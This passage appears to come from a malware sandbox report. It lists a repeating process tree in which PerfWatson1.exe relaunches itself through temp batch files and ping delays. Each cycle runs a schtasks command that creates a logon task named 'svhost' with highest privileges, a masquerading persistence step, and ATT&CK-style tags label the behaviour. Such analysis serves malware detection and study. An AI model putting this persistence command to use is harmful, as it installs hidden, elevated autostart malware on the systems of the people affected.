        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        95⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2952
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oywZ1RjYJL2A.bat" "
        95⤵
        
        PID:3900
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        96⤵
        
        PID:4100
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        96⤵
        
        PID:1108
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        96⤵
        
        PID:4844
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        97⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3744
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lP0orEwl6YvE.bat" "
        97⤵
        
        PID:4244
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        98⤵
        
        PID:2100
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        98⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5016
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        98⤵
        
        PID:1900
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        99⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7MwdS0Tay599.bat" "
        99⤵
        
        PID:3280
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        100⤵
        
        PID:1772
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        100⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:764
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        100⤵
        
        PID:228
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        101⤵
        
        PID:752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RgeIEF7Q8B77.bat" "
        101⤵
        
        PID:488
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        102⤵
        
        PID:4800
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        102⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4652
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        102⤵
        
        PID:2516
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        103⤵
        
        PID:4336
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bv2QoIJkJ2lv.bat" "
        103⤵
        
        PID:1320
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        104⤵
        
        PID:2868
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        104⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2428
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        104⤵
        
        PID:828
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        105⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4072
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DJLmcAudmnxS.bat" "
        105⤵
        
        PID:1144
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        106⤵
        
        PID:4808
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        106⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2672
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        106⤵
        
        PID:2480
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        107⤵
        
        PID:3892
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\y6JqB1ZW4QlC.bat" "
        107⤵
        
        PID:4484
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        108⤵
        
        PID:560
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        108⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4340
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        108⤵
        
        PID:2384
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        109⤵
        
        PID:652
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oheNI52vPxpY.bat" "
        109⤵
        
        PID:2660
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        110⤵
        
        PID:2296
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        110⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4836
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        110⤵
        
        PID:1232
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        111⤵
        
        PID:2100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\engfbP3sWEP9.bat" "
        111⤵
        
        PID:2648
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        112⤵
        
        PID:240
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        112⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4768
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        112⤵
        
        PID:5116
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        113⤵
        
        PID:3680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4IqHJVBZHywJ.bat" "
        113⤵
        
        PID:3528
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        114⤵
        
        PID:752
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        114⤵
        
        PID:1000
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        114⤵
        
        PID:1084
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        115⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1052
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hB4rphTfmte1.bat" "
        115⤵
        
        PID:1840
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        116⤵
        
        PID:3152
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        116⤵
        Runs ping.exe
        
        PID:1528
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        116⤵
        
        PID:3468
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        117⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3432
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6m5RfUXaVESo.bat" "
        117⤵
        
        PID:1212
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        118⤵
        
        PID:3844
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        118⤵
        Runs ping.exe
        
        PID:3896
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        118⤵
        
        PID:1228
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        119⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Is8qQeJEEeAb.bat" "
        119⤵
        
        PID:2160
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        120⤵
        
        PID:3164
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        120⤵
        
        PID:2284
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        120⤵
        
        PID:560
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        121⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2520
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\U8BzXMUL4x7I.bat" "
        121⤵
        
        PID:2164
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        122⤵
        
        PID:2704
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        122⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2156
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        122⤵
        
        PID:4676
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        123⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:696
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZIkplOsNyMEl.bat" "
        123⤵
        
        PID:1792
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        124⤵
        
        PID:3312
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        124⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4644
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        124⤵
        
        PID:5016
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        125⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:240
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TeCcyPqutaTw.bat" "
        125⤵
        
        PID:1388
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        126⤵
        
        PID:2416
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        126⤵
        Runs ping.exe
        
        PID:1220
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        126⤵
        
        PID:3360
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        127⤵
        
        PID:4660
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hUQV0YNToSBc.bat" "
        127⤵
        
        PID:2984
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        128⤵
        
        PID:3004
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        128⤵
        
        PID:1572
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        128⤵
        
        PID:4800
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        129⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2968
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\t8hnzcvOqgaP.bat" "
        129⤵
        
        PID:3420
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        130⤵
        
        PID:1444
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        130⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3320
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        130⤵
        
        PID:3168
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        131⤵
        
        PID:856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PBHsljoLLEDJ.bat" "
        131⤵
        
        PID:1096
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        132⤵
        
        PID:3148
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        132⤵
        Runs ping.exe
        
        PID:400
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        132⤵
        
        PID:2380
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        133⤵
        
        PID:2308
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Mh64sxZtnZBA.bat" "
        133⤵
        
        PID:3892
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        134⤵
        
        PID:196
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        134⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1692
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        134⤵
        
        PID:4672
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        135⤵
        
        PID:5080
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rBIRJ2YTqXdn.bat" "
        135⤵
        
        PID:3492
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        136⤵
        
        PID:2340
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        136⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4500
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        136⤵
        
        PID:4696
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        137⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2368
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bDTxL2S3Odte.bat" "
        137⤵
        
        PID:1232
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        138⤵
        
        PID:2908
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        138⤵
        
        PID:2760
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        138⤵
        
        PID:420
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        139⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1316
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cH5vOKER0g2y.bat" "
        139⤵
        
        PID:1532
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        140⤵
        
        PID:3584
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        140⤵
        Runs ping.exe
        
        PID:4680
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        140⤵
        
        PID:5040
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        141⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:788
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1RnGu1TtyRdM.bat" "
        141⤵
        
        PID:1084
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        142⤵
        
        PID:1704
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        142⤵
        Runs ping.exe
        
        PID:1604
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        142⤵
        
        PID:1444
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        143⤵
        
        PID:2092
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uOwLDwt6WODa.bat" "
        143⤵
        
        PID:920
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        144⤵
        
        PID:2844
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        144⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3296
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        144⤵
        
        PID:3148
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        145⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4808
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\G3zlOQWtkrBs.bat" "
        145⤵
        
        PID:3184
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        146⤵
        
        PID:2284
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        146⤵
        Runs ping.exe
        
        PID:3720
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        146⤵
        
        PID:724
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        147⤵
        
        PID:348
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\M1BpzeMNynyw.bat" "
        147⤵
        
        PID:412
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        148⤵
        
        PID:1372
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        148⤵
        
        PID:1820
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        148⤵
        
        PID:4672
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        149⤵
        
        PID:2472
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qIpWins6vVZi.bat" "
        149⤵
        
        PID:4500
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        150⤵
        
        PID:2200
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        150⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1284
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        150⤵
        
        PID:1760
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        151⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3116
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uvybXM0ioytF.bat" "
        151⤵
        
        PID:5016
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        152⤵
        
        PID:1252
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        152⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3680
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        152⤵
        
        PID:752
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        153⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2584
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RtX5ckhvibod.bat" "
        153⤵
        
        PID:3880
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        154⤵
        
        PID:1376
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        154⤵
        Runs ping.exe
        
        PID:788
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        154⤵
        
        PID:4028
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        155⤵
        
        PID:4092
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\25pVBqU0VBYr.bat" "
        155⤵
        
        PID:3988
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        156⤵
        
        PID:4308
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        156⤵
        Runs ping.exe
        
        PID:944
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        156⤵
        
        PID:3432
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        157⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3Ri70JIiGVo2.bat" "
        157⤵
        
        PID:5060
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        158⤵
        
        PID:5048
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        158⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2304
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        158⤵
        
        PID:3148
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        159⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1244
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qT2tg58XwItx.bat" "
        159⤵
        
        PID:4484
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        160⤵
        
        PID:4848
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        160⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:560
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        160⤵
        
        PID:4288
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        161⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2384
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZUZEhiYOZj5W.bat" "
        161⤵
        
        PID:2996
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        162⤵
        
        PID:2060
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        162⤵
        Runs ping.exe
        
        PID:3856
        
        C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
        
        "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
        162⤵
        
        PID:4672
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
        163⤵
        
        PID:3900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eKOyZgHf6T0N.bat" "
        163⤵
        
        PID:904
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        164⤵
        
        PID:836
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        164⤵
        System Network Configuration Discovery: Internet Connection Discovery
